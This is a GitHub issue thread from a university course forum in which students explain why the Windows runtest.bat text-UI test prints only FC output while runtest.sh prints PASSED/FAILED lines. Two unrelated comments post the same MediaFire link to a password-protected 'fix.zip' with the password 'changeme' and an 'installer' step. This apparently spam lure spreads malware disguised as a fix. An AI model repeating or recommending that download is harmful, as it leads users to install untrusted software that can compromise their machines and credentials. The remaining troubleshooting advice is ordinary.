### ISSUE TITLE
Test Ui Testing

### ISSUE THREAD

**Issue by tyxiangs** [nus-cs2103-AY2425S1/forum#87]
![Screenshot 2024-08-28 091640](https://github.com/user-attachments/assets/5bab8162-7e89-4e5a-8364-9a84398ec91e)
![Screenshot 2024-08-28 091651](https://github.com/user-attachments/assets/c7eb3e3e-8b85-4098-8976-1ad13209395e)
![Screenshot 2024-08-28 091739](https://github.com/user-attachments/assets/451c16c4-307f-4bfd-8f08-2bc359036a91)

Hi, I have tried many times for text-ui testing. It runs correctly but it only give output like                  FC: no differences encountered
The expected result should be "Test result: PASSED" or "Test result: FAILED", what should I do to solve it ?

**Comment by gohsl99** [comment]
May be helpful:
If you are on Windows machine, run runtest.bat in */text-ui-test/ directory, and you **will not** expecting "Test result: PASSED" or "Test result: FAILED" outputs, you will only see the output from FC command.
If your are on *nix machine, run runtest.sh in */text-ui-test/ directory, and you **will** be expecting to see "Test result: PASSED" or "Test result: FAILED" outputs.
The 2 scripts are written differently, so they will not print the same set of outputs.

**Comment by KennethTeo2002** [comment]
Your command is currently running the .bat file, which is designed to run on Windows. If you wish to run the Linux .sh file, might need to remove the "interpreter path" so that the command executed is just "bash .../runtest.sh"

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jloh02** [comment]
If you want to run the bash script, avoid using the Windows git bash command as you will need to install `dos2unix` command too. As an alternative, you can use WSL and run the test script.

**Comment by tyxiangs** [comment]
I'm using window machine. So essentially I will only get the output from FC command and will not see "Test result: Passed" or "Test result: Failed" unless I use WSL to run the test script. Am I correct ?

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gohsl99** [comment]
> I'm using window machine. So essentially I will only get the output from FC command and will not see "Test result: Passed" or "Test result: Failed" unless I use WSL to run the test script. Am I correct ?

Yeah, runtest.bat will print output from FC command only. runtest.sh then will print "Test result: Passed" or "Test result: Failed".
